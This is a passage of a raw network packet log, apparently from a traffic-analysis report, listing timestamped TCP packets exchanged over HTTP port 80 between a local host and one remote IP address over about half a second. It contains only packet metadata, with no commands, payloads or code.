                                                                                Nov 22, 2022 05:09:12.755523920 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.755528927 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.755655050 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.755695105 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.755734921 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.755750895 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.755898952 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.755939960 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.755950928 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.756115913 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.756160021 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.756164074 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.756197929 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.756314993 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.756356001 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.756364107 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.756498098 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.756542921 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.756550074 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.757873058 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.757919073 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.757958889 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.757982016 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.758091927 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.758131981 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.758171082 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.758188963 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.759356976 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.759387970 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.759442091 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.871917963 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.871942997 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.871958971 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.871977091 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.872020960 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.872051001 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.872068882 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.872128963 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.872297049 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.872315884 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.872364044 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.872493029 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.872517109 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.872534037 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.872570038 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.872736931 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.872756004 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.872775078 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.872787952 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.872828960 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.873222113 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.873250961 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.873280048 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.873298883 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.873469114 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.873497963 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.873522997 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.873542070 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.873632908 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.874747992 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.874774933 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.874792099 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.874816895 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.876498938 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.876522064 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.876542091 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.877985001 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.878007889 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.878026962 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.878041029 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.878065109 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.878252983 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.878273010 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.878292084 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.878313065 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.878969908 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.878993034 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.879055023 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.880595922 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.880616903 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.880669117 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.909475088 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.909579992 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.909607887 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.909735918 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.909754992 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.909779072 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.909820080 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.909986973 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.910012007 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.910036087 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.910059929 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.910146952 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.910171032 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.910187960 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.910279989 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.910326004 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.910356998 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.910451889 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.910475969 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.910492897 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.910588980 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.910634041 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.910662889 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.911993980 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.912040949 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.912074089 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.912195921 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.912244081 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.912273884 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.912388086 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.912431955 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.912527084 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.913511992 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.913578033 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.913646936 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:12.913676977 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.913769007 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:12.913815022 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.026339054 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.026384115 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.026453018 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.026510000 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.026556969 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.026588917 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.026607990 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.026714087 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.026746035 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.026762009 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.026803017 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.026869059 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.026973009 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.027014971 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.027050972 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.027067900 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.027101040 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.027168036 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.027214050 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.027334929 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.027368069 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.027429104 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.027477980 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.027606964 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.027638912 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.027750969 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.027810097 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.027962923 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.028889894 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.028924942 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.028943062 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.031358957 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.031414032 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.031645060 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.032032967 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.032067060 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.032083035 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.032237053 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.032270908 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.032303095 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.032363892 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.032404900 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.033133030 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.033165932 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.033184052 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.033216000 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.033246994 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.033265114 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.034990072 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.035032988 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.035118103 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.064173937 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.064219952 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.064260006 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.064308882 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.064322948 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.064368010 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.064408064 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.064424992 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.064610004 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.064651012 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.064670086 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.064711094 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.064878941 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.064922094 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.064963102 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.064985991 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.065025091 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.065064907 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.065083981 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.066210985 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.066252947 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.066282988 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.066323042 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.066358089 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.067028999 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.067071915 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.067107916 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.067939997 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.067981005 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.068016052 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.068043947 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.068084955 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.068125963 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.068144083 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.068270922 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.069494963 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.180891991 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.180937052 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.180965900 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.180994034 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.181022882 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.181276083 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.181317091 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.181329966 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.181365967 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.181457996 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.181485891 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.181513071 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.181633949 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.181751013 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.181785107 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.181808949 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.182065010 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.182233095 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.182276964 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.182306051 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.182329893 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.182388067 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.182569027 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.182904005 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.182981014 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.183154106 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.186074972 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.186218977 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.186280966 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.186311007 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.186379910 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.186445951 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.186460972 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.186522961 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.186573982 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.186635971 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.186696053 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.187336922 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.187411070 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.187428951 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.187489986 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.187541962 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.187577963 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.189133883 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.189183950 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.189224958 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.189248085 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.190722942 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.191034079 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.218777895 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.218830109 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.218904018 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.218920946 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.218972921 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.219011068 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.219052076 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.219090939 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.219115019 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.219152927 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.219192982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.219252110 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.219362020 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.220248938 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.220289946 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.220328093 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.220365047 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.220458031 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.220498085 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.220536947 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.220594883 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.222065926 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.222105980 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.222146034 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.222223997 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.222289085 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.222330093 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.222371101 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.222398043 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.222912073 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.222953081 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.224366903 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.335498095 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.335556030 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.335602045 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.335644007 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.335680962 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.335721970 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.335761070 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.335779905 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.335903883 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.335979939 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.336019039 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.336038113 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.336112022 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.336226940 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.336266994 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.336286068 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.336401939 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.336499929 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.336558104 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.336599112 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.336662054 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.336714029 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.336726904 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.336842060 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.336944103 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.336997986 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.337080956 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.337126017 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.337258101 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.337310076 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.340744019 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.340789080 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.340828896 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.340852022 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.340944052 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.341012955 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.341068983 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.341120005 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.341470003 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.341512918 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.341577053 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:13.341630936 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.341723919 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.343045950 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.343090057 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:13.343130112 CET4917580192.168.2.22183.78.168.24
